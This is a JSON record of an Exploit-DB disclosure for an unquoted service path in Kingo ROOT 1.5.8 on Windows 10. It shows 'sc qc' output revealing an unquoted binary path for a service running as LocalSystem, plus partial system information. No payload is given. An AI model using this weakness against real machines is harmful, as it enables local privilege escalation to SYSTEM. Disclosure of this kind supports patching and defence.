{"source": "https://www.exploit-db.com/exploits/51707", "vulnName": "Kingo ROOT 1.5.8 - Unquoted Service Path", "vulnEDBID": "51707", "vulnCVE": "N/A", "author": "ANISH FEROZ", "exploitType": "LOCAL", "platform": "WINDOWS", "datePublished": "2023-09-04", "vulnContent": "#Exploit Title: Kingo ROOT 1.5.8 - Unquoted Service Path\n#Date: 8/22/2023\n#Exploit Author: Anish Feroz (ZEROXINN)\n#Vendor Homepage: https://www.kingoapp.com/\n#Software Link: https://www.kingoapp.com/android-root/download.htm\n#Version: 1.5.8.3353\n#Tested on: Windows 10 Pro\n\n-------------Discovering Unquoted Path--------------\n\nC:\\Users\\Anish>sc qc KingoSoftService\n[SC] QueryServiceConfig SUCCESS\n\nSERVICE_NAME: KingoSoftService\n        TYPE               : 110  WIN32_OWN_PROCESS (interactive)\n        START_TYPE         : 2   AUTO_START\n        ERROR_CONTROL      : 1   NORMAL\n        BINARY_PATH_NAME   : C:\\Users\\Usman\\AppData\\Local\\Kingosoft\\Kingo Root\\update_27205\\bin\\KingoSoftService.exe\n        LOAD_ORDER_GROUP   :\n        TAG                : 0\n        DISPLAY_NAME       : KingoSoftService\n        DEPENDENCIES       :\n        SERVICE_START_NAME : LocalSystem\n\nC:\\Users\\Anish>systeminfo\n\nHost Name:                 DESKTOP-UT7E7CF\nOS Name:                   Microsoft Windows 10 Pro\nOS Version:                10.0.19045 N/A Build 19045\n            "}